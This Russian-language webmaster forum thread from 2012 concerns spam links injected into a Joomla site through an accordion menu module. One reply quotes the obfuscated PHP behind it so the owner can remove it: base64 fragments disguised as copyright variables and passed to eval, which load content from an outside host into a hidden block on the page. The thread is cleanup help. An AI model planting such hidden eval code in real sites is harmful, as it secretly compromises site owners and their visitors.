В общем, вчера нашел в сайте левые ссылки. _http://www.священный-коран.рф
Сайт на joomla.
Ссылки как то прикреплены к модулю аккордиону (слева), т.е. в страницах, где нет модуля нет ссылок.
сначала вручную покопался, ничего не нашел, потом по поиску попробовал стили, и т.д. по кускам - толка не было. Сейчас, по кодировкам ищу, пока без успешно.
Несколько вопросов:
1. Чем лучше искать? Я ищу на total , но бывало, что иногда он "не видит" того, что есть...
2. Где обычно прячут ссылки?
3. Как они так вставляют в сайт...замучили уже...
Кстати, сегодня обнаружил, что на другом сайте на том же хостинге тоже поставили те же ссылки. На хостинг пароль был простой, поменял.
Решил для себя - надо над безопасностью работать. Раньше не парился: появилась ссылка, ставил плагин для закрытия в noindex и все... Но так не хочется делать... так все ссылки перекрываются же..
06.09.2012 21:05Гуру
- Регистрация: 24.04.2011
- Сообщений: 801
- Репутация: 126
- 0
- 06.09.2012 21:37
Если он выскакивает в модуле аккордеоне, то и искать нужно пробовать именно там. Заходите в папку модулей Joomla по ftp и ищите там этот модуль. Скачиваете его и пробуйте искать. Если тотал коммандер не помогает, значит нужно искать закодированный текст вручную (скорее всего base64).
Если не сможете найти, можете кинуть модуль мне на почту (сообщу в личку, если нужно)- 0
- 07.09.2012 14:54
В файле MenuBase (mod_accordion_menu >> core >> MenuBase) попробуйте удалить строки:
PHP код:// Copyright (c) OFFLAJN.COM
$UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";
$MenuAcoAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";
$MenuAcoName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";
$MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";
$SystemJoCode = $UnixTimeLastEdit.$MenuAcoAuthor.$MenuAcoName.$MainDomain;
echo eval(base64_decode($SystemJoCode)); }
- 1
Спасибо сказали:
xilgiz(07.09.2012), - 07.09.2012 19:12Гуру
- Регистрация: 24.04.2011
- Сообщений: 801
- Репутация: 126
Все, и на втором сайте нашел ссылки - точно такие же.
Вот как они взламывают сайт то? Раньше сохранял в браузере пароли, сейчас перестал.
Через ftp total comander а тоже могут?- 0
- 07.09.2012 22:45
могут и через тотал коммандер, могут и через filezilla и через почту.... Этих способов очень много. Так же может быть такое, что взломали Вашего хостера, а Вы от этого пострадали.
- 0
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Снимаем покупные ссылки на сайт | Дайджест блогосферы | 4 | 09.06.2013 13:24 |
Ссылки какой тематики брать на сайт? | Вопросы от новичков | 8 | 22.12.2011 21:12 |
Ссылки на сайт, тематика кино | Ссылки, статьи | 1 | 05.09.2011 16:56 |
10 способов получить бесплатные ссылки на сайт | Дайджест блогосферы | 1 | 21.07.2010 12:58 |
adsense cpa parser proxy wordpress yandex youtube zennoposter аккаунт база банка быть версия вечный вконтакт гугл делиться день есть запрос изменение импорт использовать качественный кейс ключ комплексный контакт купить можно новый нч-сч партнерский партнёрка партнёрская программа платформа поддержка поинт поинтовый прогон программа продвижение продвинуть работа сайт сервис скрипт спам ссылка стать стоимость страна страница тариф тиц-пр трастовый трафик учет форум шаблон
Тем:
77,476Сообщений:
761,508Пользователей:
30,076Сейчас на сайте:
0 пользователей и 296 гостей
